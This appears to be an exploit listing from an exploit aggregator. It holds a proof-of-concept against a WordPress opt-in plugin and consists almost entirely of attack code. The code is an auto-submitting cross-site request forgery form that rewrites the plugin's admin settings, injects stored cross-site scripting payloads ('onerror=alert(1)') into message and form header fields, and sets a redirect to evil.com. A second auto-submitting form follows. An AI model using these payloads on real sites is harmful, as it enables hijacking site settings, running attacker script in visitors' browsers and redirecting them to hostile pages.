Share
## https://sploitus.com/exploit?id=WPEX-ID:46B634F6-92BC-4E00-A4C0-C25135C61922
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-opt-in%2Fwp-opt-in.php" method="POST">
<input type="text" name="wpoi_hidden" value="SAb13c">
<input type="text" name="wpoi_email_from" value="test@example.com">
<input type="text" name="wpoi_email_subject" value="[example.com] Requested e-mail">
<input type="text" name="wpoi_email_message" value="hacked">
<input type="text" name="wpoi_email_notify" value="">
<input type="text" name="wpoi_msg_bad" value="<p><b>Bad e-mail address.</b></p>">
<input type="text" name="wpoi_msg_fail" value="<p><b>Failed sending to e-mail address.</b></p>">
<input type="text" name="wpoi_msg_sent" value="<img src=x onerror=alert(1)>">
<input type="text" name="wpoi_form_header" value="<img src=x onerror=alert(1)>">
<input type="text" name="wpoi_form_footer" value="</div>">
<input type="text" name="wpoi_form_email" value="E-mail:">
<input type="text" name="wpoi_form_send" value="Submit">
<input type="text" name="wpoi_url_redir" value="https://evil.com">
<input type="text" name="Submit" value="Update Options ยป">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/asasas" method="POST">
<input type="text" name="wpoi_email" value="test@example.com">
</form>
<script>
document.getElementById("test").submit();
</script>